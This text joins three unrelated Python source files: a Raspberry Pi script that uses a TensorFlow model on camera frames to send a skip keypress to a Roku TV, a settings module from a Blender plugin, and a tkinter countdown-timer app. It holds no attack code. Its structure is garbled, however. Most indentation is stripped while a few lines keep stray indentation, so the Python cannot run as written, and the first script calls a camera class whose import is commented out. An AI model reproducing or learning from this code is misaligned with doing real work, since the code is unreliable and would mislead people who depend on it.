from flask_restful import Api, Resource, reqparse
from flask import Request
from urllib.parse import urlencode
import requests
import time, threading
import sqlite3
import tensorflow as tf
import matplotlib.pyplot as plt
import os
import numpy as np
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.preprocessing import image
from tensorflow import keras
#from picamera import PiCamera
from cv2 import *
from numpy import exp
from time import sleep
from random import randrange
import shutil
import serial
import datetime
StartTime=time.time()
con = sqlite3.connect("skippi.db")
selectedIP = ""
dirname=os.path.dirname(__file__)
pathToModel = dirname+ '/ai/skipBotModelDataColorv22TF2_0_0BigColorv12.h5'
pathToImage =dirname+ '/holdImages/img.jpg'
print(pathToModel)
print(pathToImage)
model = keras.models.load_model(pathToModel, compile=False)
def action() :
con = sqlite3.connect("skippi.db")
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT running FROM run_status")
runStatus = cur.fetchall()
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT ip FROM tv_ip")
selectedIP = cur.fetchall()
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT cameraType, cameraNumber FROM camera_type")
cameraInfo = cur.fetchall()
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT skipMethod FROM skip_method")
skipMethodInfo = cur.fetchall()
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT hour , endTime FROM end_timer")
endTimerInfo = cur.fetchall()
if len(selectedIP)>0:
selectedIP = selectedIP[0][0]
#need test here
print('test')
print(runStatus[0][0])
    if endTimerInfo[0][1] not in (0, "0"):
if datetime.datetime.strptime(endTimerInfo[0][1], "%Y-%m-%dT%H:%M:%S") < datetime.datetime.now():
con.execute("DELETE FROM end_timer")
cur = con.cursor()
cur.execute("INSERT into end_timer (hour,endTime) values (?,?)",("0","0"))
con.commit()
con.execute("DELETE FROM run_status")
cur = con.cursor()
cur.execute("INSERT into run_status (running) values (?)",("0"))
con.commit()
if runStatus[0][0] == "1":
if cameraInfo[0][0] == 0:
camera = PiCamera()
camera.capture(pathToImage)
camera.close()
elif cameraInfo[0][0] == 1:
#else use USB webcam
cam = VideoCapture(cameraInfo[0][1])
s, img = cam.read()
if s: # frame captured without any errors
namedWindow("cam-test",CV_WINDOW_AUTOSIZE)
imshow("cam-test",img)
waitKey(0)
destroyWindow("cam-test")
imwrite(pathToImage,img) #save image
img = image.load_img(pathToImage, target_size=(256,256) , grayscale=True) #, grayscale=True
X= image.img_to_array(img)
X = np.expand_dims(X,axis=0)
images = np.vstack([X])
val = model.predict(images)
print(softmax(val[0]))
print(sum(val))
val = sum(val)
if val[1] == 1:
print('SKIP')
#if HID Microcontroller selected
if skipMethodInfo[0][0] == 1:
ser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)
ser.flush()
ser.write(str(1).encode('utf-8'))
#if WiFi over Roku is selected (Default)
elif skipMethodInfo[0][0] == 0:
print("http://" + selectedIP + ":8060/keypress/enter" )
try:
url = "http://" + selectedIP + ":8060/keypress/enter"
res = requests.post(url, json='')
print('response from server:',res.text)
except:
print('error on skip post')
#shutil.move('/home/pi/Desktop/reactFlaskFinal/api/holdImages/img.jpg', "/media/pi/A986-6E38/MentoredTrainingData/Skip/img_S"+str(randrange(99999999999999))+".jpg")
cur = con.cursor()
cur.execute("UPDATE skip_count set skips = skips + 1 ")
con.commit()
else:
print('no skip')
#shutil.move('/home/pi/Desktop/reactFlaskFinal/api/holdImages/img.jpg', "/media/pi/A986-6E38/MentoredTrainingData/NoSkip/img_S"+str(randrange(99999999999999))+".jpg")
cur = con.cursor()
cur.execute("UPDATE NOskip_count set NOskips = NOskips + 1 ")
con.commit()
con.close()
def softmax(x):
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum(axis=0)
class setInterval :
def __init__(self,interval,action) :
self.interval=interval
self.action=action
self.stopEvent=threading.Event()
thread=threading.Thread(target=self.__setInterval)
thread.start()
def __setInterval(self) :
nextTime=time.time()+self.interval
while not self.stopEvent.wait(nextTime-time.time()) :
nextTime+=self.interval
self.action()
def cancel(self) :
self.stopEvent.set()
# start action() every 4 seconds
inter=setInterval(4,action)
#print('just after setInterval -> time : {:.1f}s'.format(time.time()-StartTime))
# will stop interval in 5s
#t=threading.Timer(0,inter.cancel)
#t.start()
class StartSkip(Resource):
def post(self):
con = sqlite3.connect("skippi.db")
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT running FROM run_status")
runStatus = cur.fetchall()
print(runStatus[0][0])
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT ip FROM tv_ip")
selectedIP = cur.fetchall()
selectedIP = selectedIP[0][0]
        print(selectedIP)
if runStatus[0][0] == "0" :
cur = con.cursor()
cur.execute("UPDATE run_status set running = 1")
con.commit()
else:
cur = con.cursor()
cur.execute("UPDATE run_status set running = 0")
con.commit()
final_ret = {"runStatus":runStatus[0][0] }
return final_ret
|
settings.py
|
# MIT License
# Copyright (c) 2017 GiveMeAllYourCats
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Code author: Hotox
# Edits by: Hotox
import os
import bpy
import json
import copy
import time
import pathlib
import collections
from threading import Thread
from datetime import datetime, timezone
from collections import OrderedDict
from .. import globs
from ..tools.register import register_wrap
# from ..googletrans import Translator # Todo Remove this
from ..extern_tools.google_trans_new.google_trans_new import google_translator
from . import translate as Translate
from .translations import t
main_dir = pathlib.Path(os.path.dirname(__file__)).parent.resolve()
resources_dir = os.path.join(str(main_dir), "resources")
settings_file = os.path.join(resources_dir, "settings.json")
settings_data = None
settings_data_unchanged = None
# Settings name = [Default Value, Require Blender Restart]
settings_default = OrderedDict()
settings_default['show_mmd_tabs'] = [True, False]
settings_default['embed_textures'] = [False, False]
settings_default['ui_lang'] = ["auto", False]
# settings_default['use_custom_mmd_tools'] = [False, True]
lock_settings = False
@register_wrap
class RevertChangesButton(bpy.types.Operator):
bl_idname = 'cats_settings.revert'
bl_label = t('RevertChangesButton.label')
bl_description = t('RevertChangesButton.desc')
bl_options = {'INTERNAL'}
def execute(self, context):
for setting in settings_default.keys():
setattr(bpy.context.scene, setting, settings_data_unchanged.get(setting))
save_settings()
self.report({'INFO'}, t('RevertChangesButton.success'))
return {'FINISHED'}
@register_wrap
class ResetGoogleDictButton(bpy.types.Operator):
bl_idname = 'cats_settings.reset_google_dict'
bl_label = t('ResetGoogleDictButton.label')
bl_description = t('ResetGoogleDictButton.desc')
bl_options = {'INTERNAL'}
def execute(self, context):
Translate.reset_google_dict()
Translate.load_translations()
self.report({'INFO'}, t('ResetGoogleDictButton.resetInfo'))
return {'FINISHED'}
@register_wrap
class DebugTranslations(bpy.types.Operator):
bl_idname = 'cats_settings.debug_translations'
bl_label = t('DebugTranslations.label')
bl_description = t('DebugTranslations.desc')
bl_options = {'INTERNAL'}
def execute(self, context):
bpy.context.scene.debug_translations = True
translator = google_translator()
try:
translator.translate('猫')
except:
self.report({'INFO'}, t('DebugTranslations.error'))
bpy.context.scene.debug_translations = False
self.report({'INFO'}, t('DebugTranslations.success'))
return {'FINISHED'}
def load_settings():
# print('READING SETTINGS FILE')
global settings_data, settings_data_unchanged
# Load settings file and reset it if errors are found
try:
with open(settings_file, encoding="utf8") as file:
settings_data = json.load(file, object_pairs_hook=collections.OrderedDict)
# print('SETTINGS LOADED!')
except FileNotFoundError:
print("SETTINGS FILE NOT FOUND!")
reset_settings(full_reset=True)
return
except json.decoder.JSONDecodeError:
print("ERROR FOUND IN SETTINGS FILE")
reset_settings(full_reset=True)
return
if not settings_data:
print("NO DATA IN SETTINGS FILE")
reset_settings(full_reset=True)
return
to_reset_settings = []
# Check for missing entries, reset if necessary
for setting in ['last_supporter_update']:
if setting not in settings_data and setting not in to_reset_settings:
to_reset_settings.append(setting)
print('RESET SETTING', setting)
# Check for other missing entries, reset if necessary
for setting in settings_default.keys():
if setting not in settings_data and setting not in to_reset_settings:
to_reset_settings.append(setting)
print('RESET SETTING', setting)
# Check if timestamps are correct
utc_now = datetime.strptime(datetime.now(timezone.utc).strftime(globs.time_format), globs.time_format)
for setting in ['last_supporter_update']:
if setting not in to_reset_settings and settings_data.get(setting):
try:
timestamp = datetime.strptime(settings_data.get(setting), globs.time_format)
except ValueError:
to_reset_settings.append(setting)
print('RESET TIME', setting)
continue
# If timestamp is in future
time_delta = (utc_now - timestamp).total_seconds()
if time_delta < 0:
to_reset_settings.append(setting)
print('TIME', setting, 'IN FUTURE!', time_delta)
else:
pass
# print('TIME', setting, 'IN PAST!', time_delta)
# If there are settings to reset, reset them
if to_reset_settings:
reset_settings(to_reset_settings=to_reset_settings)
return
# Save the settings into the unchanged settings in order to know if the settings changed later
settings_data_unchanged = copy.deepcopy(settings_data)
def save_settings():
with open(settings_file, 'w', encoding="utf8") as outfile:
json.dump(settings_data, outfile, ensure_ascii=False, indent=4)
def reset_settings(full_reset=False, to_reset_settings=None):
if not to_reset_settings:
full_reset = True
global settings_data, settings_data_unchanged
if full_reset:
settings_data = OrderedDict()
settings_data['last_supporter_update'] = None
for setting, value in settings_default.items():
settings_data[setting] = value[0]
else:
for setting in to_reset_settings:
if setting in settings_default.keys():
settings_data[setting] = settings_default[setting][0]
else:
settings_data[setting] = None
save_settings()
settings_data_unchanged = copy.deepcopy(settings_data)
print('SETTINGS RESET')
def start_apply_settings_timer():
global lock_settings
lock_settings = True
thread = Thread(target=apply_settings, args=[])
thread.start()
def apply_settings():
applied = False
while not applied:
if hasattr(bpy.context, 'scene'):
try:
settings_to_reset = []
for setting in settings_default.keys():
try:
setattr(bpy.context.scene, setting, settings_data.get(setting))
except TypeError:
settings_to_reset.append(setting)
if settings_to_reset:
reset_settings(to_reset_settings=settings_to_reset)
print("RESET SETTING ON TIMER:", setting)
except AttributeError:
time.sleep(0.3)
continue
applied = True
# print('Refreshed Settings!')
else:
time.sleep(0.3)
# Unlock settings
global lock_settings
lock_settings = False
def settings_changed():
for setting, value in settings_default.items():
if value[1] and settings_data.get(setting) != settings_data_unchanged.get(setting):
return True
return False
def update_settings(self, context):
# Use False and None for this variable, because Blender would complain otherwise
# None means that the settings did change
settings_changed_tmp = False
if lock_settings:
return settings_changed_tmp
for setting in settings_default.keys():
old = settings_data[setting]
new = getattr(bpy.context.scene, setting)
if old != new:
settings_data[setting] = getattr(bpy.context.scene, setting)
settings_changed_tmp = True
if settings_changed_tmp:
save_settings()
return settings_changed_tmp
def set_last_supporter_update(last_supporter_update):
settings_data['last_supporter_update'] = last_supporter_update
save_settings()
def get_last_supporter_update():
return settings_data.get('last_supporter_update')
def get_use_custom_mmd_tools():
return settings_data.get('use_custom_mmd_tools')
def get_embed_textures():
return settings_data.get('embed_textures')
def get_ui_lang():
return settings_data.get('ui_lang')
|
main.py
|
# TimerX v1.1
# IMPORTS
ver = "1.1"
import time
import tkinter
import webbrowser
from pathlib import Path
from platform import system
from threading import Thread
from tkinter import Frame, PhotoImage, Tk, ttk
from tkinter.constants import DISABLED, END, LEFT
from tkinter.filedialog import askopenfile
import darkdetect
import sv_ttk
from playsound import playsound
if system() == "Windows":
from win10toast_click import ToastNotifier
import ctypes
from utils import *
if not Path("config.json").exists():
createConfig()
config = loadConfig(ver)
theme = config["theme"]
if config["theme"] == "System":
if darkdetect.isDark():
theme = "Dark"
else:
theme = "Light"
# TKINTER WINDOW
app = Tk()
app.title("")
app.minsize(width=300, height=210)
sv_ttk.set_theme(theme.lower())
bg_color = ttk.Style().lookup(".", "background")
# SYSTEM CODE
def seticon(win):
try:
if system() == "darwin":
win.iconbitmap("./assets/logo_new.icns")
elif system() == "Windows":
win.iconbitmap("./assets/logo_new.ico")
else:
logo_img = PhotoImage(file="./assets/logo_new.png")
win.iconphoto(False, logo_img)
except tkinter.TclError:
try:
win.iconphoto("assets/logo.ico")
except tkinter.TclError:
pass
def fullredraw(e):
global prev_state
print(prev_state)
if prev_state == "zoomed":
print("this")
true_value = ctypes.c_int(1)
ctypes.windll.dwmapi.DwmSetWindowAttribute(
app.wm_frame(), 3, ctypes.byref(true_value), ctypes.sizeof(true_value)
)
app.iconify()
app.deiconify()
false_value = ctypes.c_int(0)
ctypes.windll.dwmapi.DwmSetWindowAttribute(
app.wm_frame(), 3, ctypes.byref(false_value), ctypes.sizeof(false_value)
)
prev_state = app.state()
seticon(app)
# VARIABLES
app_on = True
timer_on = False
timer_paused = False
timer_seconds = int(config["default_seconds"])
timer_minutes = int(config["default_minutes"])
timer_hours = int(config["default_hours"])
# FUNCTIONS
def playBuzzer():
playsound(config["sound_path"])
def startstopButtonPressed(*_):
global timer_on, timer_paused, timer_hours, timer_minutes, timer_seconds, last_paused
if timer_on and not timer_paused:
timer_on = False
timer_paused = True
last_paused = time.time()
timer_hours = hours_left
timer_minutes = minutes_left
timer_seconds = seconds_left
play_button.configure(text="Play")
elif not timer_paused and not timer_on:
play_button.configure(text="Pause")
timer_thread = Thread(target=runTimer, daemon=True)
timer_thread.start()
else:
timer_paused = False
timer_on = True
play_button.configure(text="Pause")
def saveTimer(secs, mins, hours, manager_app_window):
global timer_seconds, timer_minutes, timer_hours
timer_seconds = int(secs)
timer_minutes = int(mins)
timer_hours = int(hours)
time_selected_display.configure(
text=f"{hours} Hours, {mins} Minutes, {secs} Seconds"
)
time_display.configure(text=f"{hours} : {mins} : {secs}")
    if manager_app_window is not None:
manager_app_window.destroy()
def showNotification():
if system() == "Windows":
notification = ToastNotifier()
notification.show_toast(
"TimerX",
"Time's up!",
icon_path="./assets/logo_new.ico",
duration="None",
threaded=True,
callback_on_click=app.focus_force(),
)
def runTimer():
global timer_seconds, timer_minutes, timer_hours, timer_on, app, config, last_paused, seconds_left, minutes_left, hours_left
timer_seconds = config["default_seconds"]
timer_minutes = config["default_minutes"]
timer_hours = config["default_hours"]
seconds_left = timer_seconds
minutes_left = timer_minutes
hours_left = timer_hours
milliseconds_left = 99
timer_on = True
last_paused = time.time()
while True:
if timer_on and not timer_paused:
latest_time = time.time()
time_to_subtract = round((latest_time - last_paused), 3)
split_time = str(time_to_subtract).split(".")
ty_res = time.gmtime(int(split_time[0]))
formatted_time = time.strftime(f"%H:%M:%S:{split_time[1]}", ty_res)
milliseconds_left -= int(split_time[1])
split_fmt_time = formatted_time.split(":")
hours_left = int(timer_hours) - int(split_fmt_time[0])
minutes_left = int(timer_minutes) - int(split_fmt_time[1])
seconds_left = int(timer_seconds) - int(split_fmt_time[2])
if seconds_left < 0 and minutes_left == 0 and hours_left == 0:
break
if seconds_left < 0:
subtract_secs = abs(seconds_left)
seconds_left = 60 - subtract_secs
minutes_left -= 1
if minutes_left < 0:
subtract_mins = abs(minutes_left)
minutes_left = 60 - subtract_mins
hours_left -= 1
time_display.configure(
text=f"{hours_left} : {minutes_left} : {seconds_left}"
)
timer_on = False
play_button.config(text="Play")
if config["notify"]:
showNotification()
if config["sound"]:
playBuzzer()
def setAlwaysOnTop():
app.attributes("-topmost", config["ontop"])
setAlwaysOnTop()
# WINDOWS
def createManagerWindow(saveTimer, current_mins, current_secs, current_hrs):
global manager_app_window, config
manager_app_window = tkinter.Toplevel()
manager_app_window.geometry("250x170")
manager_app_window.title("Edit Timer")
manager_app_window.wait_visibility()
manager_app_window.attributes("-alpha", config["transperency"])
manager_app_window.resizable(False, False)
seticon(manager_app_window)
# VALIDATION
validate_command = manager_app_window.register(validate)
# WINDOW FRAME
manager_window = ttk.Frame(manager_app_window)
manager_window.pack(fill="both", expand=True)
timer_hr_label = ttk.Label(manager_window, text="Hours: ")
timer_hr_label.place(x=17, y=17)
timer_hr_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_hr_input.place(x=65, y=10)
timer_hr_input.insert(1, current_hrs)
timer_min_label = ttk.Label(manager_window, text="Minutes: ")
timer_min_label.place(x=13, y=57)
timer_min_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_min_input.place(x=65, y=50)
timer_min_input.insert(1, current_mins)
timer_sec_label = ttk.Label(manager_window, text="Seconds: ")
timer_sec_label.place(x=12, y=97)
timer_sec_input = ttk.Entry(
manager_window, validate="key", validatecommand=(validate_command, "%P")
)
timer_sec_input.place(x=65, y=90)
timer_sec_input.insert(1, current_secs)
ok_button = ttk.Button(
manager_window,
text="Ok!",
command=lambda: saveTimer(
timer_sec_input.get(),
timer_min_input.get(),
timer_hr_input.get(),
manager_app_window,
),
style="Accent.TButton",
)
ok_button.place(x=95, y=126)
def createSettingsWindow():
global theme, config, sp
settings_window = tkinter.Toplevel()
settings_window.geometry("500x320")
settings_window.title("Settings")
settings_window.resizable(False, False)
settings_window.wait_visibility()
settings_window.attributes("-alpha", config["transperency"])
seticon(settings_window)
tabview = ttk.Notebook(settings_window)
tabview.pack(fill="both", expand=True)
tab_1 = ttk.Frame(tabview)
tab_2 = ttk.Frame(tabview)
tab_3 = ttk.Frame(tabview)
tab_4 = ttk.Frame(tabview)
tabview.add(tab_1, text="Appearence")
tabview.add(tab_2, text="Notifications & Sound")
tabview.add(tab_3, text="Timer Defaults")
tabview.add(tab_4, text="About")
theme_label = ttk.Label(
tab_1,
text=" Change theme of the app",
image=theme_dark,
compound=LEFT,
)
theme_label.place(x=23, y=23)
transparency_label = ttk.Label(
tab_1,
text=" Adjust Transparency of the app",
image=transparency_dark,
compound=LEFT,
)
transparency_label.place(x=23, y=73)
pin_label = ttk.Label(
tab_1, text=" Keep app always on top", image=pin_dark, compound=LEFT
)
pin_label.place(x=23, y=123)
speaker_label = ttk.Label(
tab_2,
text=" Play sound when timer ends",
image=speaker_dark,
compound=LEFT,
)
speaker_label.place(x=23, y=23)
bell_label = ttk.Label(
tab_2,
text=" Show notification when timer ends",
image=bell_dark,
compound=LEFT,
)
bell_label.place(x=23, y=73)
sound_path_label = ttk.Label(tab_2, text="Default Sound:").place(x=23, y=123)
default_secs_label = ttk.Label(tab_3, text=" Default Seconds:").place(x=23, y=23)
default_mins_label = ttk.Label(tab_3, text=" Default Minutes:").place(x=23, y=93)
default_hours_label = ttk.Label(tab_3, text=" Default Hours:").place(x=23, y=163)
logo_label = ttk.Label(tab_4, image=logo).place(x=50, y=30)
TimerX_Label = ttk.Label(
tab_4, text="TimerX", font=("Arial Rounded MT Bold", 50)
).place(x=210, y=40)
version_Label = ttk.Label(
tab_4, text=f"Version: {ver}", font=("Segoe UI", "20")
).place(x=220, y=120)
github_btn = ttk.Button(
tab_4,
text=" Fork on Github",
image=github_logo_dark,
compound=LEFT,
command=lambda: webbrowser.open("https://github.com/Futura-Py/TimerX"),
)
github_btn.place(x=50, y=200)
website_btn = ttk.Button(
tab_4,
text=" Check out our Website!",
image=globe_dark,
compound=LEFT,
command=lambda: webbrowser.open("https://Futura-Py.netlify.app/"),
)
website_btn.place(x=250, y=200)
if theme == "Dark":
theme_label.configure(image=theme_dark)
transparency_label.configure(image=transparency_dark)
speaker_label.configure(image=speaker_dark)
bell_label.configure(image=bell_dark)
pin_label.configure(image=pin_dark)
github_btn.configure(image=github_logo_dark)
website_btn.configure(image=globe_dark)
else:
theme_label.configure(image=theme_light)
transparency_label.configure(image=transparency_light)
speaker_label.configure(image=speaker_light)
bell_label.configure(image=bell_light)
pin_label.configure(image=pin_light)
github_btn.configure(image=github_logo_light)
website_btn.configure(image=globe_light)
theme_combobox = ttk.Spinbox(
tab_1,
state="readonly",
values=("Dark", "Light", "System"),
wrap=True,
)
theme_combobox.place(x=275, y=20)
theme_combobox.set(config["theme"])
def slider_changed(value):
value = float(value) / 100
settings_window.attributes("-alpha", value)
app.attributes("-alpha", value)
slider = ttk.Scale(
tab_1,
from_=40,
to=99,
orient="horizontal",
command=slider_changed,
)
slider.set(float(config["transperency"]) * 100)
slider.place(x=325, y=75)
sound_button = ttk.Checkbutton(tab_2, style="Switch.TCheckbutton")
if config["sound"]:
sound_button.state(["!alternate", "selected"])
else:
sound_button.state(["!alternate"])
sound_button.place(x=360, y=25)
notify_button = ttk.Checkbutton(tab_2, style="Switch.TCheckbutton")
if config["notify"]:
notify_button.state(["!alternate", "selected"])
else:
notify_button.state(["!alternate"])
notify_button.place(x=360, y=75)
ontop_button = ttk.Checkbutton(tab_1, style="Switch.TCheckbutton")
if config["ontop"]:
ontop_button.state(["!alternate", "selected"])
else:
ontop_button.state(["!alternate"])
ontop_button.place(x=360, y=125)
def browse():
filedialog = askopenfile(
mode="r", filetypes=[("Audio Files", ["*.mp3", "*.wav"])]
)
        if filedialog is not None:
sound_path_entry.delete(0, END)
sound_path_entry.insert(1, filedialog.name)
sound_path_entry = ttk.Entry(tab_2, width=35)
sound_path_entry.insert(1, config["sound_path"])
sound_path_entry.place(x=130, y=115)
spe_error_lbl = tkinter.Label(tab_2, fg="red", font=("", 10), text="")
spe_error_lbl.place(x=130, y=150)
browse_btn = ttk.Button(tab_2, text="Browse", command=lambda: browse())
browse_btn.place(x=410, y=115)
default_secs_entry = ttk.Entry(tab_3)
default_secs_entry.insert(1, config["default_seconds"])
default_secs_entry.place(x=280, y=15)
dse_error_lbl = tkinter.Label(tab_3, fg="red", font=("", 10), text="")
dse_error_lbl.place(x=280, y=50)
default_mins_entry = ttk.Entry(tab_3)
default_mins_entry.insert(1, config["default_minutes"])
default_mins_entry.place(x=280, y=85)
dme_error_lbl = tkinter.Label(tab_3, fg="red", font=("", 10), text="")
dme_error_lbl.place(x=280, y=120)
default_hours_entry = ttk.Entry(tab_3)
default_hours_entry.insert(1, config["default_hours"])
default_hours_entry.place(x=280, y=155)
dhe_error_lbl = tkinter.Label(tab_3, fg="red", font=("", 10), text="")
dhe_error_lbl.place(x=280, y=190)
def ApplyChanges():
global theme
config["theme"] = theme = theme_combobox.get()
if theme == "System":
if darkdetect.isDark():
theme = "Dark"
else:
theme = "Light"
config["transperency"] = float(slider.get()) / 100
config["sound"] = sound_button.instate(["selected"])
config["notify"] = notify_button.instate(["selected"])
config["ontop"] = ontop_button.instate(["selected"])
config["default_seconds"] = default_secs_entry.get()
config["default_minutes"] = default_mins_entry.get()
config["default_hours"] = default_hours_entry.get()
config["sound_path"] = sp
setAlwaysOnTop()
saveTimer(
config["default_seconds"],
config["default_minutes"],
config["default_hours"],
None,
)
saveTimer(
config["default_seconds"],
config["default_minutes"],
config["default_hours"],
None,
)
saveConfig(config)
sv_ttk.set_theme(theme.lower())
if theme == "Dark":
settings_btn.configure(image=settings_image_dark)
time_display.configure(fg="white")
else:
settings_btn.configure(image=settings_image_light)
time_display.configure(fg="black")
settings_window.destroy()
def VerifyEntrys():
global sp
def Error(reason, entry, label):
if reason == "wv":
entry.state(["invalid"])
label.configure(text="Enter a number below 60")
elif reason == "wv2":
entry.state(["invalid"])
label.configure(text="Enter a number below 24")
elif reason == "not_int":
entry.state(["invalid"])
label.configure(text="Enter a number")
elif reason == "wv-":
entry.state(["invalid"])
label.configure(text="Enter a number above 0")
elif reason == "wv-2":
entry.state(["invalid"])
label.configure(text="Enter a number above -1")
elif reason == "sound":
entry.state(["invalid"])
label.configure(text="This file doesnt exist.")
validated = True
try:
void = int(default_secs_entry.get())
if not void < 60:
validated = False
Error("wv", default_secs_entry, dse_error_lbl)
if not void > 0:
validated = False
Error("wv-", default_secs_entry, dse_error_lbl)
except ValueError:
Error("not_int", default_secs_entry, dse_error_lbl)
validated = False
try:
void = int(default_mins_entry.get())
if not void < 60:
validated = False
Error("wv", default_mins_entry, dme_error_lbl)
if not void > -1:
validated = False
Error("wv-2", default_mins_entry, dme_error_lbl)
except ValueError:
Error("not_int", default_mins_entry, dme_error_lbl)
validated = False
try:
void = int(default_hours_entry.get())
if not void <= 24:
validated = False
Error("wv2", default_hours_entry, dhe_error_lbl)
if not void > -1:
validated = False
Error("wv-2", default_hours_entry, dhe_error_lbl)
except ValueError:
Error("not_int", default_hours_entry, dhe_error_lbl)
validated = False
sp = sound_path_entry.get()
sp = sp.replace("\\", "/")
if not Path(sp).exists():
Error("sound", sound_path_entry, spe_error_lbl)
validated = False
if validated == True:
ApplyChanges()
for index in [tab_1, tab_2, tab_3]:
ttk.Button(
index,
text="Apply Changes",
command=lambda: VerifyEntrys(),
style="Accent.TButton",
).place(x=250, y=230)
ttk.Button(
index, text="Cancel", command=lambda: settings_window.destroy()
).place(x=125, y=230)
if not system() == "Windows" or system() == "win":
notify_button.configure(state=DISABLED)
def reset_dse(e):
default_secs_entry.state(["!invalid"])
dse_error_lbl.configure(text="")
def reset_dme(e):
default_mins_entry.state(["!invalid"])
dme_error_lbl.configure(text="")
def reset_dhe(e):
default_hours_entry.state(["!invalid"])
dhe_error_lbl.configure(text="")
def reset_spe(e):
sound_path_entry.state(["!invalid"])
spe_error_lbl.configure(text="")
default_secs_entry.bind("<FocusOut>", reset_dse)
default_secs_entry.bind("<FocusIn>", reset_dse)
default_secs_entry.bind("<KeyRelease>", reset_dse)
default_mins_entry.bind("<FocusOut>", reset_dme)
default_mins_entry.bind("<FocusIn>", reset_dme)
default_mins_entry.bind("<KeyRelease>", reset_dme)
default_hours_entry.bind("<FocusOut>", reset_dhe)
default_hours_entry.bind("<FocusIn>", reset_dhe)
default_hours_entry.bind("<KeyRelease>", reset_dhe)
sound_path_entry.bind("<FocusOut>", reset_spe)
sound_path_entry.bind("<FocusIn>", reset_spe)
sound_path_entry.bind("<KeyRelease>", reset_spe)
# KEYBINDS
app.bind("key-space", startstopButtonPressed)
app.grid_rowconfigure(0, weight=1)
app.grid_rowconfigure(2, weight=1)
app.grid_columnconfigure(1, weight=1)
# IMAGES
settings_image_light = PhotoImage(file="./assets/images/light/settings.png")
settings_image_dark = PhotoImage(file="./assets/images/dark/settings.png")
# WINDOW FRAME
window = Frame(app)
# WINDOW ELEMENTS
time_selected_display = tkinter.Label(
master=app,
text=f"{timer_hours} Hours, {timer_minutes} Minutes, {timer_seconds} Seconds",
font=("Segoe UI Variable", 10),
fg="white",
)
time_selected_display.grid(column=1, row=0, sticky="N", pady=10)
time_display = tkinter.Label(
master=app,
text=f"{timer_hours} : {timer_minutes} : {timer_seconds}",
font=("Segoe UI Variable", 30),
fg="white",
)
time_display.grid(column=1, row=0, sticky="", rowspan=2, pady=20)
play_button = ttk.Button(
master=app,
text="Play",
width=25,
command=startstopButtonPressed,
style="Accent.TButton",
)
play_button.grid(column=1, row=0, sticky="S", rowspan=2)
manager_button = ttk.Button(
master=app,
text="Edit Timer",
command=lambda: createManagerWindow(
saveTimer, timer_minutes, timer_seconds, timer_hours
),
width=25,
)
manager_button.grid(column=1, row=2, sticky="N", pady=10)
settings_btn = ttk.Button(
master=app,
image=settings_image_dark,
command=lambda: createSettingsWindow(),
style="Toolbutton",
)
def sizechanged(e):
settings_btn.place(x=5, y=app.winfo_height() - 45)
# Scale the clock fonts based on window height, then window width
if app.winfo_height() >= 220:
    size_table = [
        # (min height, min width, timer font size, heading font size)
        (390, 420, 100, 25),
        (370, 420, 90, 25),
        (350, 400, 80, 25),
        (330, 360, 70, 23),
        (290, 360, 60, 20),
        (270, 299, 50, 17),  # width > 299, i.e. width >= 300
        (250, 299, 40, 13),
    ]
    for min_h, min_w, big_font, small_font in size_table:
        if app.winfo_height() > min_h:
            if app.winfo_width() > min_w:
                time_display.configure(font=("Segoe UI Variable", big_font))
                time_selected_display.configure(font=("Segoe UI Variable", small_font))
            break
    else:
        # Window height between 220 and 250: use the smallest fonts
        time_display.configure(font=("Segoe UI Variable", 30))
        time_selected_display.configure(font=("Segoe UI Variable", 10))
play_button.configure(width=int(app.winfo_width() / 12))
manager_button.configure(width=int(app.winfo_width() / 12))
def makeWindowsBlur():
from sys import getwindowsversion
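# Windows 11 builds start at 22000, so Mica is only available from that build onward;
# older builds fall back to the acrylic blur from BlurWindow below.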
if getwindowsversion().build >= 22000:
from win32mica import MICAMODE, ApplyMica
app.wm_attributes("-transparent", bg_color)
app.update()
if theme == "Dark":
ApplyMica(
HWND=ctypes.windll.user32.GetParent(app.winfo_id()),
ColorMode=MICAMODE.DARK,
)
else:
ApplyMica(
HWND=ctypes.windll.user32.GetParent(app.winfo_id()),
ColorMode=MICAMODE.LIGHT,
)
else:
from BlurWindow.blurWindow import GlobalBlur
app.wm_attributes("-transparent", bg_color)
if theme == "Dark":
GlobalBlur(
ctypes.windll.user32.GetParent(app.winfo_id()),
Acrylic=True,
hexColor="#1c1c1c",
Dark=True,
)
else:
pass
# LOAD IMAGES
theme_dark = PhotoImage(file="./assets/images/dark/dark_theme.png")
theme_light = PhotoImage(file="./assets/images/light/dark_theme.png")
transparency_dark = PhotoImage(file="./assets/images/dark/transparency.png")
transparency_light = PhotoImage(file="./assets/images/light/transparency.png")
speaker_dark = PhotoImage(file="./assets/images/dark/speaker.png")
speaker_light = PhotoImage(file="./assets/images/light/speaker.png")
bell_dark = PhotoImage(file="./assets/images/dark/bell.png")
bell_light = PhotoImage(file="./assets/images/light/bell.png")
